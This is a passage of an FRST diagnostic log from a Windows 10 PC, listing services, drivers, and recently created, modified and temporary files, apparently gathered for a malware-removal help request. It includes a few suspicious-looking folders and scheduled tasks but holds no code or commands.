    R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
    R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [351120 2015-07-18] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
    S3 PAExec; C:\Windows\PAExec.exe [190464 2014-10-18] (Power Admin LLC) [File not signed]
    R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145256 2011-08-02] (Nuance Communications, Inc.)
    R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [54272 2015-12-18] (Razer Inc.) [File not signed]
    R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-05] ()
    R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1750712 2015-06-16] (Safer-Networking Ltd.)
    R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2102496 2015-06-16] (Safer-Networking Ltd.)
    R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [224712 2015-07-24] (Safer-Networking Ltd.)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
    S2 Hamachi2Svc; D:\LogMeIn\hamachi-2.exe -s [X]
    S2 jhi_service; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe" [X]
    S2 LMS; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe" [X]

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-29] (Advanced Micro Devices, Inc.)
    R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [22240 2013-10-28] ()
    R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29168 2015-07-02] ()
    R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [89944 2015-07-02] (Avast Software s.r.o.)
    R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2015-07-02] (Avast Software s.r.o.)
    R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65736 2015-07-02] ()
    S1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1047320 2015-07-02] (Avast Software s.r.o.)
    R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [442264 2015-07-02] (Avast Software s.r.o.)
    R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [137288 2015-07-02] (Avast Software s.r.o.)
    R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [272248 2015-07-02] ()
    R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-09-18] (Advanced Micro Devices)
    S3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
    S3 LADF_DHP2; C:\Windows\system32\DRIVERS\ladfDHP2amd64.sys [62168 2010-09-29] (Logitech)
    S3 LADF_SBVM; C:\Windows\system32\DRIVERS\ladfSBVMamd64.sys [377176 2010-09-29] (Logitech)
    R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
    R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
    R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
    R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
    R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [895256 2015-06-23] (Realtek )
    S3 rzdaendpt; C:\Windows\System32\drivers\rzdaendpt.sys [43720 2015-08-14] (Razer Inc)
    S3 rzendpt; C:\Windows\System32\drivers\rzendpt.sys [50392 2015-08-14] (Razer Inc)
    R3 rzmpos; C:\Windows\System32\drivers\rzmpos.sys [48840 2015-08-14] (Razer Inc)
    R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [37184 2015-09-23] (Razer, Inc.)
    R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [130880 2015-12-15] (Razer, Inc.)
    S3 rzvkeyboard; C:\Windows\System32\drivers\rzvkeyboard.sys [44232 2015-08-14] (Razer Inc)
    S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
    R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [273824 2015-07-02] (Avast Software)
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
    R3 XtuAcpiDriver; C:\Windows\System32\drivers\XtuAcpiDriver.sys [63840 2015-06-06] (Intel Corporation)
    U3 idsvc; no ImagePath
    S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
    U3 wpcsvc; no ImagePath

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-02-29 20:46 - 2016-02-29 20:46 - 00028580 _____ C:\Users\Kym\Desktop\FRST.txt
    2016-02-29 20:43 - 2016-02-29 20:46 - 00000000 ____D C:\FRST
    2016-02-29 20:39 - 2016-02-29 20:39 - 00002342 _____ C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000207 _____ C:\WINDOWS\tweaking.com-regbackup-KYM-PC-Windows-10-Home-(64-bit).dat
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\RegBackup
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
    2016-02-29 20:38 - 2016-02-29 20:40 - 05198336 _____ (AVAST Software) C:\Users\Kym\Desktop\aswMBR.exe
    2016-02-29 20:38 - 2016-02-29 20:39 - 00016377 _____ C:\WINDOWS\Tweaking.com - Registry Backup Setup Log.txt
    2016-02-29 20:36 - 2016-02-29 20:43 - 02371072 _____ (Farbar) C:\Users\Kym\Desktop\FRST64.exe
    2016-02-29 20:35 - 2016-02-29 20:38 - 04777232 _____ (Tweaking.com) C:\Users\Kym\Downloads\tweaking.com_registry_backup_setup.exe
    2016-02-29 20:32 - 2016-02-29 20:32 - 00016148 _____ C:\WINDOWS\system32\KYM-PC_Kym_HistoryPrediction.bin
    2016-02-29 19:37 - 2016-02-29 20:31 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
    2016-02-29 19:34 - 2016-02-29 19:34 - 00000000 ____D C:\WINDOWS\pss
    2016-02-28 21:02 - 2016-01-08 22:44 - 00000822 _____ C:\WINDOWS\system32\Drivers\etc\hosts.20160228-210203.backup
    2016-02-28 18:59 - 2016-02-28 18:59 - 00000000 ____D C:\Program Files\Common Files\AV
    2016-02-28 18:50 - 2016-02-28 21:01 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
    2016-02-28 18:50 - 2016-02-28 20:23 - 00001494 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
    2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
    2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
    2016-02-28 18:50 - 2016-02-28 18:50 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
    2016-02-28 18:50 - 2015-06-16 17:32 - 00020760 _____ (Safer-Networking Ltd.) C:\WINDOWS\system32\sdnclean64.exe
    2016-02-28 18:04 - 2016-02-28 18:48 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Kym\Downloads\spybot-2.4.exe
    2016-02-26 06:50 - 2016-02-26 06:50 - 00002378 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2016-02-26 00:30 - 2016-02-26 06:49 - 00000000 ____D C:\Users\Kym\AppData\Local\Deployment
    2016-02-26 00:30 - 2016-02-26 00:30 - 00000000 ____D C:\Users\Kym\AppData\Local\Apps\2.0
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Sun
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Oracle
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\.oracle_jre_usage
    2016-02-21 16:39 - 2016-02-21 16:39 - 00000000 ____D C:\ProgramData\0342bcb1-0de3-0
    2016-02-21 16:34 - 2016-02-21 16:34 - 00003878 _____ C:\WINDOWS\System32\Tasks\{9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D}
    2016-02-21 16:34 - 2016-02-21 16:34 - 00000000 ____D C:\ProgramData\3c355888
    2016-02-21 16:34 - 2016-02-21 16:34 - 00000000 ____D C:\ProgramData\0342bcb1-60e1-0
    2016-02-21 16:33 - 2016-02-21 16:33 - 00000000 ____D C:\ProgramData\{21b5474a-312c-0}
    2016-02-21 16:33 - 2016-02-21 16:33 - 00000000 ____D C:\ProgramData\{0b5d3910-112c-1}
    2016-02-18 15:04 - 2016-02-18 17:51 - 00000000 ____D C:\Users\Kym\Documents\Kalyani
    2016-02-15 19:06 - 2016-02-15 19:06 - 00223232 _____ C:\Users\Kym\Downloads\Archibald Prize 2015 information.pdf
    2016-02-15 13:32 - 2016-02-15 13:32 - 00281328 _____ C:\WINDOWS\Minidump\021516-19125-01.dmp
    2016-02-13 19:16 - 2016-02-13 19:19 - 00000000 ____D C:\Users\Kym\AppData\Local\FullTiltPoker
    2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Party
    2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\cef-cache
    2016-02-13 19:00 - 2016-02-13 19:00 - 00000683 _____ C:\Users\Public\Desktop\Full Tilt Poker.lnk
    2016-02-13 19:00 - 2016-02-13 19:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Full Tilt Poker
    2016-02-13 18:11 - 2016-02-13 19:00 - 00877888 _____ C:\Users\Kym\Downloads\PartyPokerSetup.exe
    2016-02-13 18:10 - 2016-02-13 18:59 - 73087280 _____ C:\Users\Kym\Downloads\FullTiltSetup.exe
    2016-02-13 18:10 - 2016-02-13 18:10 - 00877888 _____ C:\Users\Kym\Downloads\Unconfirmed 937642.crdownload
    2016-02-10 23:28 - 2016-01-31 16:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
    2016-02-10 23:28 - 2016-01-31 16:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
    2016-02-10 23:28 - 2016-01-31 16:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
    2016-02-10 23:28 - 2016-01-31 16:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
    2016-02-10 23:28 - 2016-01-31 16:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
    2016-02-10 23:28 - 2016-01-31 16:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
    2016-02-10 23:28 - 2016-01-31 15:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
    2016-02-10 23:28 - 2016-01-31 15:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2016-02-10 23:28 - 2016-01-31 15:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
    2016-02-10 23:28 - 2016-01-31 15:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
    2016-02-10 23:28 - 2016-01-31 15:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
    2016-02-10 23:28 - 2016-01-31 15:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2016-02-10 23:28 - 2016-01-31 15:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
    2016-02-10 23:28 - 2016-01-31 15:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
    2016-02-10 23:28 - 2016-01-31 15:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2016-02-10 23:28 - 2016-01-31 15:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
    2016-02-10 23:28 - 2016-01-31 15:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
    2016-02-10 23:28 - 2016-01-31 15:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2016-02-10 23:27 - 2016-01-31 16:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
    2016-02-10 23:27 - 2016-01-31 16:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
    2016-02-10 23:27 - 2016-01-31 16:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
    2016-02-10 23:27 - 2016-01-31 16:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
    2016-02-10 23:27 - 2016-01-31 15:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
    2016-02-10 23:27 - 2016-01-31 15:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
    2016-02-10 23:27 - 2016-01-31 15:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
    2016-02-10 23:27 - 2016-01-31 15:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2016-02-10 23:27 - 2016-01-31 15:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
    2016-02-10 23:27 - 2016-01-31 15:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
    2016-02-10 23:27 - 2016-01-31 15:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
    2016-02-10 23:27 - 2016-01-31 15:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
    2016-02-10 23:27 - 2016-01-31 15:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2016-02-10 23:27 - 2016-01-31 15:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
    2016-02-10 23:27 - 2016-01-31 15:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
    2016-02-10 23:27 - 2016-01-31 15:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
    2016-02-10 23:27 - 2016-01-31 15:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
    2016-02-10 23:27 - 2016-01-31 15:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
    2016-02-10 23:27 - 2016-01-31 15:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2016-02-10 23:27 - 2016-01-31 15:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2016-02-10 23:27 - 2016-01-31 15:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
    2016-02-10 23:27 - 2016-01-31 15:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
    2016-02-10 23:27 - 2016-01-31 15:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
    2016-02-10 23:27 - 2016-01-31 15:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
    2016-02-10 23:27 - 2016-01-31 15:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
    2016-02-10 23:27 - 2016-01-31 15:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
    2016-02-10 23:27 - 2016-01-31 15:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2016-02-10 23:27 - 2016-01-31 15:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2016-02-10 23:27 - 2016-01-31 14:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
    2016-02-10 23:27 - 2016-01-31 14:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
    2016-02-09 22:56 - 2016-02-09 22:56 - 00281328 _____ C:\WINDOWS\Minidump\020916-19296-01.dmp
    2016-02-09 03:29 - 2016-02-09 03:29 - 00001277 _____ C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CNext.lnk
    2016-02-09 03:28 - 2016-02-09 03:28 - 00004296 _____ C:\WINDOWS\System32\Tasks\AMD Updater
    2016-02-09 03:25 - 2016-02-13 19:16 - 00000000 ____D C:\Users\Kym\AppData\Local\AMD
    2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
    2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
    2016-02-09 03:20 - 2016-02-09 03:23 - 322471624 _____ (AMD Inc.) C:\Users\Kym\Downloads\radeon-crimson-15.12-win10-64bit.exe
    2016-02-08 02:13 - 2016-02-08 02:13 - 00000202 _____ C:\Users\Kym\Desktop\Tom Clancy's Rainbow Six Siege.url
    2016-02-06 01:02 - 2016-02-28 20:24 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\uTorrent
    2016-02-03 19:16 - 2016-02-03 19:16 - 06253170 _____ C:\Users\Kym\Downloads\1776 - Donkey Kong Country 2 (U)(Independent).zip
    2016-02-03 19:07 - 2016-02-03 19:08 - 11918630 _____ C:\Users\Kym\Downloads\2214 - Donkey Kong Country 3 (E)(Rising Sun).zip
    2016-02-03 19:06 - 2016-02-03 19:06 - 02981626 _____ C:\Users\Kym\Downloads\Donkey Kong Country 2 - Diddy's Kong Quest (USA) (En,Fr) (Rev A).zip
    2016-02-03 19:04 - 2016-02-03 19:04 - 05642942 _____ C:\Users\Kym\Downloads\1055 - Donkey Kong Country (U)(Evasion).zip
    2016-02-02 12:22 - 2016-02-02 12:22 - 00000000 ____D C:\Users\Kym\Documents\MIsc

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-02-29 20:42 - 2014-10-12 20:42 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2016-02-29 20:37 - 2015-08-09 01:28 - 01011482 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-02-29 20:37 - 2015-07-10 21:02 - 00000000 ____D C:\WINDOWS\INF
    2016-02-29 20:35 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\AppReadiness
    2016-02-29 20:32 - 2015-08-09 01:48 - 00000000 __SHD C:\Users\Kym\IntelGraphicsProfiles
    2016-02-29 20:32 - 2015-08-09 01:27 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
    2016-02-29 20:32 - 2015-07-10 22:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-02-29 20:32 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
    2016-02-29 20:32 - 2014-05-02 21:01 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2016-02-29 20:31 - 2015-07-10 19:05 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
    2016-02-29 19:06 - 2014-05-02 21:01 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2016-02-29 12:23 - 2015-07-10 21:04 - 00000000 ___HD C:\Program Files\WindowsApps
    2016-02-28 21:23 - 2014-05-02 22:28 - 00000000 ____D C:\Users\Kym\AppData\Roaming\uTorrent
    2016-02-28 18:06 - 2015-12-25 19:32 - 00004144 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5957CCCD-7167-42EC-BDE9-58F86B871E77}
    2016-02-28 17:59 - 2014-05-02 21:43 - 00004280 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
    2016-02-26 00:31 - 2015-08-09 11:27 - 00000000 ____D C:\Users\Kym\AppData\Local\MicrosoftEdge
    2016-02-25 23:54 - 2009-07-14 15:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
    2016-02-25 23:38 - 2015-04-09 16:31 - 00000000 ____D C:\Users\Kym\Documents\Outlook Files
    2016-02-25 23:16 - 2015-08-09 01:29 - 00000000 ____D C:\Users\Kym
    2016-02-25 23:16 - 2014-10-18 18:59 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
    2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
    2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\Program Files (x86)\Java
    2016-02-25 22:43 - 2014-10-18 18:43 - 00000000 ____D C:\AMD
    2016-02-21 16:34 - 2015-12-24 16:50 - 00000000 ____D C:\ProgramData\3af26a8e-45f1-1
    2016-02-21 16:34 - 2015-12-24 16:50 - 00000000 ____D C:\ProgramData\3af26a8e-3475-0
    2016-02-19 20:02 - 2015-03-12 22:56 - 00000000 ____D C:\Users\Kym\AppData\Local\Spotify
    2016-02-19 20:01 - 2015-03-12 22:54 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Spotify
    2016-02-18 21:54 - 2016-01-16 18:56 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
    2016-02-18 00:33 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-02-16 19:47 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\rescache
    2016-02-16 19:24 - 2014-05-25 16:10 - 00000000 ____D C:\Users\Kym\AppData\Local\ElevatedDiagnostics
    2016-02-15 20:11 - 2015-08-09 01:48 - 00000000 ____D C:\Users\Kym\AppData\Local\Packages
    2016-02-15 13:32 - 2015-09-27 23:34 - 00000000 ____D C:\WINDOWS\Minidump
    2016-02-13 19:10 - 2014-11-20 11:53 - 00000000 ____D C:\Users\Kym\AppData\Local\PokerStars
    2016-02-13 13:57 - 2015-07-10 23:14 - 00000000 ____D C:\Program Files\Windows Journal
    2016-02-12 19:44 - 2015-08-08 23:54 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
    2016-02-12 19:42 - 2015-07-10 20:55 - 00000000 ____D C:\WINDOWS\CbsTemp
    2016-02-12 19:42 - 2009-07-14 12:34 - 00000478 _____ C:\WINDOWS\win.ini
    2016-02-12 19:41 - 2014-05-04 15:26 - 00000000 ____D C:\WINDOWS\system32\MRT
    2016-02-12 19:37 - 2014-05-04 15:26 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2016-02-09 03:30 - 2014-09-29 14:52 - 00000000 ____D C:\Program Files (x86)\Raptr
    2016-02-09 03:25 - 2015-08-09 01:27 - 00000000 ____D C:\Program Files\AMD
    2016-02-09 03:25 - 2015-02-12 08:41 - 00000000 ____D C:\Program Files (x86)\AMD
    2016-02-09 03:19 - 2014-09-22 17:29 - 00000000 ____D C:\ProgramData\AMD
    2016-02-08 23:26 - 2015-11-28 22:42 - 00000000 ____D C:\Users\Kym\AppData\Local\Ubisoft Game Launcher
    2016-02-08 16:30 - 2014-09-02 15:05 - 00000000 ____D C:\Users\Kym\Documents\My Games
    2016-02-08 16:17 - 2015-08-09 01:28 - 00000000 ____D C:\ProgramData\Package Cache
    2016-02-03 08:47 - 2015-07-10 21:06 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
    2016-02-03 08:47 - 2015-07-10 21:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
    2016-02-02 17:01 - 2014-05-02 21:01 - 00003978 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
    2016-02-02 17:01 - 2014-05-02 21:01 - 00003746 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
    2016-02-01 22:21 - 2014-10-03 09:28 - 00000000 ____D C:\Users\Kym\Documents\Bond
    2016-02-01 21:47 - 2014-05-02 21:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive

    ==================== Files in the root of some directories =======

    2015-09-08 19:17 - 2015-09-08 19:17 - 0000000 _____ () C:\Program Files (x86)\ATI Technologies
    2015-08-14 11:25 - 2015-08-14 11:25 - 0000000 _____ () C:\Program Files (x86)\Common Files\AMD
    2014-07-23 14:06 - 2015-02-19 13:45 - 0000953 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Settings.ini
    2014-07-23 17:57 - 2015-08-09 01:04 - 0000028 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Usage.ini
    2015-05-21 11:30 - 2015-05-21 11:31 - 0001062 _____ () C:\Users\Kym\AppData\Roaming\SpeedRunnersLog.txt
    2014-05-02 20:55 - 2014-08-28 11:18 - 0007599 _____ () C:\Users\Kym\AppData\Local\Resmon.ResmonCfg
    2015-06-18 16:22 - 2015-06-18 16:27 - 0000260 _____ () C:\ProgramData\csgobm.project
    2015-06-18 16:22 - 2015-06-18 16:27 - 0000002 _____ () C:\ProgramData\csgobm2.project
    2015-06-18 16:19 - 2015-06-18 16:19 - 0010299 _____ () C:\ProgramData\csgobmbacked.cfg
    2015-06-18 16:19 - 2015-06-18 16:19 - 0000077 _____ () C:\ProgramData\csgobmsettings.ini
    2015-08-09 01:27 - 2015-08-09 01:27 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

    Files to move or delete:
    ====================
    C:\Users\Kym\IP_Log_Data.js
    C:\Users\Kym\Network_Meter_Data.js


    Some files in TEMP:
    ====================
    C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
    C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
    C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
    C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
